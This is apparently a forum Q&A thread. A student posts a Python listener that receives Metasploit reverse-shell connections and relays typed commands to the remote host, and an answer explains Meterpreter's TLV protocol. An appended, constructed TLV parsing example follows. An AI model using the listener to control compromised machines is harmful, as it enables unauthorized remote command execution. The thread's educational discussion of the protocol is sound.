
I'm a cybersecurity student, I'm not a cracker, script kiddie or something like this. I'm working on a Python Meterpreter listener. I found a normal TCP reverse handler; it is working with cmd reverse TCP (Metasploit), but it is not working with Meterpreter reverse TCP (Metasploit)... Anyone know why? Thanks.

#!/usr/bin/env python3
# import python modules
import socket

HOST = ''                 # '' means bind to all interfaces
PORT = 4444               # port
# create our socket handler
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# set it so that when we cancel out we can reuse the port
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind to interface
s.bind((HOST, PORT))
# print that we are accepting connections
print("Listening on 0.0.0.0:%s" % str(PORT))
# listen for only 10 connections
s.listen(10)
# accept connections
conn, addr = s.accept()
# print connected by ip address
print('Connected by', addr)
# receive initial connection
data = conn.recv(1024)
# start loop
while True:
    # enter shell command
    command = input("Enter shell command or quit: ")
    # send shell command (sockets carry bytes, so encode the string)
    conn.send(command.encode())
    # if we specify quit then break out of loop and close socket
    if command == "quit":
        break
    # receive output from linux command
    data = conn.recv(1024)
    # print the output of the linux command
    print(data.decode(errors="replace"))
# close socket
conn.close()
Syrion

1 Answer


This won't work with Meterpreter because Meterpreter's transports support a custom protocol. In order for your "listener" to work with Meterpreter, you will also have to implement this protocol.

It's fairly well documented these days. You can start by reading up on it on the Metasploit GitHub repo's wiki. For information on the process that Meterpreter goes through to get running, check out this 44con talk (shameless plug); it covers the TLV packets as well. You'll need to support multiple transports, including SSL-wrapped TCP.

Once you've got the TLV stuff working, you'll need to implement all the commands that Meterpreter supports. This doesn't just include the single-shot commands (such as getsystem or ls), you'll have to support stuff like channels.

I won't lie, you're in for a lot of work. Making a functional Meterpreter listener isn't an easy job, and there's quite a bit more to it than you would expect. The fact that there's no Python implementation out there already is a sign.

Best of luck!

OJ.
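The TLV framing the answer refers to, as an added example that is not part of the original post, the answer, or Metasploit's own code. It shows why the raw string-passing listener in the question cannot interoperate with a client that speaks a type-length-value protocol: each message is a length-prefixed record, values are typed, group TLVs nest, and a receiver has to read exactly the declared length off the socket rather than whatever a single recv(1024) happens to return. Only the general shape (4-byte big-endian length including the 8-byte header, 4-byte type, value) is taken from the documented TLV layout; the meta-type bits, the type numbers such as TLV_METHOD, the method name, and the omission of Metasploit's real packet header are all constructed for this example and must not be treated as Metasploit's constants. The decoder also rejects implausible or out-of-range length fields before trusting them, which is the check a defender's traffic decoder needs as much as a listener does.

```python
#!/usr/bin/env python3
"""Illustrative TLV framing for a Meterpreter-style transport (constructed example).

Layout per TLV: 4-byte big-endian length (includes this 8-byte header),
4-byte type, value.  A packet is itself a length/type header followed by
concatenated TLVs.  All numeric type values below are made up for the
example and are NOT Metasploit's constants.
"""
import socket
import struct

HEADER = struct.Struct(">II")  # (length, type) in network byte order

# Constructed meta-type bits: the high bits of a type say how to decode the value.
META_STRING = 0x10000
META_UINT = 0x20000
META_GROUP = 0x40000000

# Constructed request-level types for the example.
TLV_METHOD = META_STRING | 1
TLV_REQUEST_ID = META_STRING | 2
TLV_RESULT = META_UINT | 4
TLV_ARGS = META_GROUP | 100


def encode_tlv(tlv_type, value):
    """Serialize one TLV; group values are lists of (type, value) pairs."""
    if tlv_type & META_GROUP:
        payload = b"".join(encode_tlv(t, v) for t, v in value)
    elif tlv_type & META_STRING:
        payload = value.encode() + b"\x00"  # NUL-terminated string
    elif tlv_type & META_UINT:
        payload = struct.pack(">I", value)
    else:
        payload = bytes(value)  # raw bytes
    return HEADER.pack(HEADER.size + len(payload), tlv_type) + payload


def decode_tlvs(buf):
    """Return a list of (type, value) pairs from concatenated TLVs.

    Every length field is validated against the buffer before it is used,
    so a truncated or lying length raises ValueError instead of mis-parsing.
    """
    out = []
    off = 0
    while off < len(buf):
        if len(buf) - off < HEADER.size:
            raise ValueError("truncated TLV header at offset %d" % off)
        length, tlv_type = HEADER.unpack_from(buf, off)
        if length < HEADER.size or off + length > len(buf):
            raise ValueError("bad TLV length %d at offset %d" % (length, off))
        payload = buf[off + HEADER.size:off + length]
        if tlv_type & META_GROUP:
            value = decode_tlvs(payload)  # nested TLVs
        elif tlv_type & META_STRING:
            value = payload.rstrip(b"\x00").decode()
        elif tlv_type & META_UINT:
            value = struct.unpack(">I", payload)[0]
        else:
            value = payload
        out.append((tlv_type, value))
        off += length
    return out


def is_well_formed(buf):
    """True if buf parses as a clean sequence of TLVs."""
    try:
        decode_tlvs(buf)
        return True
    except ValueError:
        return False


def encode_packet(tlvs, packet_type=0):
    body = b"".join(encode_tlv(t, v) for t, v in tlvs)
    return HEADER.pack(HEADER.size + len(body), packet_type) + body


def recv_exact(sock, n):
    """Read exactly n bytes: a single recv() may legitimately return fewer."""
    chunks, remaining = [], n
    while remaining:
        chunk = sock.recv(remaining)
        if not chunk:
            raise ConnectionError("peer closed mid-packet")
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def recv_packet(sock, max_len=1 << 20):
    """Read one length-prefixed packet and decode its TLVs."""
    length, packet_type = HEADER.unpack(recv_exact(sock, HEADER.size))
    if length < HEADER.size or length > max_len:  # never trust the peer's length blindly
        raise ValueError("implausible packet length %d" % length)
    return packet_type, decode_tlvs(recv_exact(sock, length - HEADER.size))


def demo():
    """Round-trip a constructed request through a local socketpair."""
    a, b = socket.socketpair()
    try:
        request = [(TLV_METHOD, "example_method"),          # constructed method name
                   (TLV_REQUEST_ID, "req-0001"),
                   (TLV_ARGS, [(TLV_RESULT, 0), (TLV_METHOD, "nested")])]
        a.sendall(encode_packet(request))
        return recv_packet(b)
    finally:
        a.close()
        b.close()


if __name__ == "__main__":
    print(demo())
```

Run it directly to see the decoded request come back over the socketpair. The point to notice against the question's listener is that nothing here sends or expects a bare string: a peer that frames its traffic this way will treat "whoami" as a garbage header, which is the mismatch the answer describes.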